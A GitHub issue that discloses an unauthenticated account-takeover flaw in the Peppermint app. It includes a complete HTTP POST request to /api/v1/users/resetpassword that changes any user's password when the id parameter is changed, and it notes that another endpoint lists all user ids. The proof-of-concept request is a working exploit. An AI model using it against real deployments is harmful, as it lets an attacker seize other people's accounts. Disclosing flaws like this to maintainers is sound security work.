peppermint icon indicating copy to clipboard operation
peppermint copied to clipboard

Published 20 hours ago verified publisher icon Peppermint-Lab

Vulnerability: Account Takeover - Arbitrary Password Change (unauthenticated)

Open blockisec opened this issue 2 years ago • 0 comments

The password reset endpoint (/api/v1/users/resetpassword) allows any unauthenticated user to change passwords of any other user by just incrementing the id JSON parameter.

POST /api/v1/users/resetpassword HTTP/1.1
Host: localhost:5000
Content-Length: 35
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
sec-ch-ua-platform: "Linux"
Content-Type: application/json
Accept: */*
Origin: http://localhost:5000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:5000/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"password":"changeme5678","id":1}

The request above will reset the password of the user with id=1 to changeme5678.

The api endpoint /api/v1/users/all gives a list of all users (with their id) to unauthenticated users.

blockisec avatar Jul 21 '22 04:07 blockisec